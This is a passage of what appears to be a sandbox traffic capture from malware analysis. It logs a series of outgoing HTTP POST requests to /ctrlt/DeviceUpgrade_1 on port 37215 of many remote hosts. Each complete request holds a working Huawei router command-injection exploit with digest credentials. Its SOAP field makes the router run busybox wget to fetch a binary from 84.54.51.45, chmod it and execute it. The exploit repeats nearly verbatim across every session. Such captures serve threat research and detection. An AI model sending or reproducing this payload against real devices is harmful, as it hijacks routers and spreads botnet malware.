                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            708192.168.2.153848641.234.3.14137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.161581993 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            709192.168.2.154087241.245.210.6637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.161598921 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            710192.168.2.153699241.27.76.14537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.161600113 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            711192.168.2.154167441.134.207.17137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.161664009 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            712192.168.2.154987041.129.210.14137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.161678076 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            713192.168.2.155348041.113.200.8837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.161678076 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            714192.168.2.155416241.161.233.23537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.161679029 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            715192.168.2.154372441.40.234.4537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.161711931 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            716192.168.2.153792241.89.200.19537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.161715984 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            717192.168.2.154150241.85.152.8237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.161784887 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
